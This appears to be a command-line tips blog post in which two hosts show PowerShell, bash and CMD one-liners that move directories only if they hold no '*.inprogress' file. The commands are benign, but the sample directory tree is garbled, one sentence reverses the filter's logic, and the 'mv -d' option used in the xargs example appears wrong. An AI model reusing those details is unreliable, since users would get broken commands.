Episode #169: Move Me Maybe

Tim checks the mailbag

Carlos IHaveNoLastName writes in asking for a way to move a directory to a new destination. That's easy, but the directory should only be moved if the the directory (at any depth) does NOT contain a file with a specific extenstion.

Here is an example of a sample directory structure:

| |-File1
| |-File2
| |-File2

| |-File1
| |-File2
| |-File2

In this example we should NOT move SomeTopDir1 because it contains a file with the string "inprogress". We should however move SomeTopDir2 because it contains no such file. In short, "inprogress" means leave it alone.

Executing this in PowerShell is quite easy. CMD is a pain, and I'll skip that crazy long command because it is a circus trick. Here is the command to do exactly what Carlos asked:

PS C:\jobsdir> Get-ChildItem | ? { $_.PSIsContainer } | 
? { -not ( Get-ChildItem $_ -Recurse -Filter *.inprogress ) } |
Move-Item -Destination \archive

This command with use Get-ChildItem to list the contents of the current directory. We first filter for Directories (Container objects) just in case there are files in the root of the directory that we don't want to move. Next, another Where-Object cmdlet (alias ?) is used to check all the sub-directories and look for a file matching "*.inprogress". The -Not operator inverts the match so that only directores with a "*.inprogress" file will be passed down the pipeline.

At this point we have the directories that do not contain this file. The results are then piped into Move-Item and the directories are moved to the \archive directory.

One of the other criteria that Mr. IHaveNoLastName requested is that the command must work on XP. Well it does, but only if you install PowerShell. Sadly, XP does not support PowerShell v3. With PowerShell v3's simplified syntax (and some additional aliases) we can shorten the command to this:

PS C:\jobsdir> ls | ? PSIsContainer | ? { -not ( ls $_ -r -fi *.inprogress ) } | 
mv -d \archive

Thanks for an easy one Carlos! Hal, your turn. I suspect this is will be almost as easy for you (even though it won't work on XP).

Hal takes it easy

This one's quite do-able in the shell. But unlike Tim's solution, the most straightforward approach in Linux is a loop:

for i in *; do [ "$(find $i -type f -name \*.inprogress)" ] || mv $i /some/dest; done

The loop is over all of the directories in the current directory. Inside the loop we run a find command looking for "*.inprogress" files. If we find any, then the test operator ("[ ... ]") returns true and we don't do the mv command on the other side of the "||". If we find nothing, then the directory gets moved. Easy peasy

"But wait!", I hear you cry, "That was too easy. And besides, you're running a mv command for each individual directory!"

OK, fine. You want a single mv command? Here you go:

mv $(ls | grep -vf <(find * -type f -name \*.inprogress | cut -f1 -d/)) /some/dest

Happy now?

The best way to puzzle this one out is to start with the command in the innermost parentheses:

find * -type f -name \*.inprogress | cut -f1 -d/

The find command returns the pathnames of all of the *.inprogress files, and the cut command pulls off the top-level directory name. If there are multiple *.inprogress files in a single directory, we'll get multiple instances of the top-level directory name, but that doesn't really matter.

The "<( ... )" syntax takes the output of our find pipeline and lets it be treated as an input file for another command:

ls | grep -vf <( ... )

We take the output of ls and use "grep -v" to filter out directories we don't want. Normally "grep -f" takes a list of patterns from an input file, but in this case we use the "<( ... )" syntax to substitute our find output instead of a normal input file. So we suppress any directories that have a *.inprogress file in them. Anything left over is a directory without a *.inprogress file, which is precisely the set of directories we want to move.

So we wrap the complicated ls pipline up in "$(...)" so that the output-- the list of directories we want to move-- is substituted into the "mv $(...) /some/dest" command. And that gets us to where we want to be.

Or you could use the same idea, but with xargs:

ls | grep -vf <(find * -type f -name \*.inprogress | cut -f1 -d/) | xargs mv -d /some/dest

This looks a lot more like Tim's approach in Powershell. However, this makes use of the "mv -d /some/dest ..." syntax that's supported in the GNU version of the command, but not widely supported in other more traditional Unix distros.

Oh, and by the way, Tim, this all works fine under Windows XP if you'd just install Cygwin like I've been telling you to...


m_cnd wrote in again with a shortcut for CMD.EXE:

dir SomeTopDir /s /b | findstr /i /e ".extension" > nul || move SomeTopDir Destination

I use this trick all the time, so I feel bad that I missed it here. With his shortcut I can put together a For loop (our favorite, and only, text parser) to do the work.

C:\> for /F "tokens=*" %i in ('dir /b /AD') do dir "%i" /s /b /a-d "%i\*.extension" 1>nul 2>nul || move "%i" Destination

The Dir command with /AD will list directories and not files. We can then use the output to search and move if necessary. The Tokens and quotes are used in case the directory names contain spaces.

Thanks again m_cnd!